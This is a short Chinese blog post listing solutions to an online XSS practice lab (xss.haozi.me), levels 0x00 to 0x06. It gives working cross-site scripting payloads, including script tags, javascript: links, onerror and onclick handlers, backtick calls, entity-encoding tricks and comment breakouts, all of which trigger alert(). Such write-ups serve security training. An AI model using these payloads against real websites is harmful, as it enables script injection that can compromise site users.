https://xss.haozi.me/#

Posted on 2022-07-04 20:38 季啊阅读(165) 评论(0) 编辑收藏举报

0x00:
<script>alert(1)</script>
0x01:
</textarea><a href="javascript:alert(1)">asdf</a>
0x02:
" onclick="alert(1)
0x03:``反撇
<a href="javascript:alert`1`">asdf</a>
<img src=1 onclick="alert`2`">
<iframe src="javascript:alert(1)">
0x04:实体编码绕过
<a href="javascript:alert(1)">adf</a>
<img src=1 onerror="alert(1)">
0x05:
--!> <a href="javascript:alert(1&#41">asdf</a><!--
--!><script>alert()</script>
0x06：换行

onclick
=alert()

刷新页面返回顶部

ajine

https://xss.haozi.me/#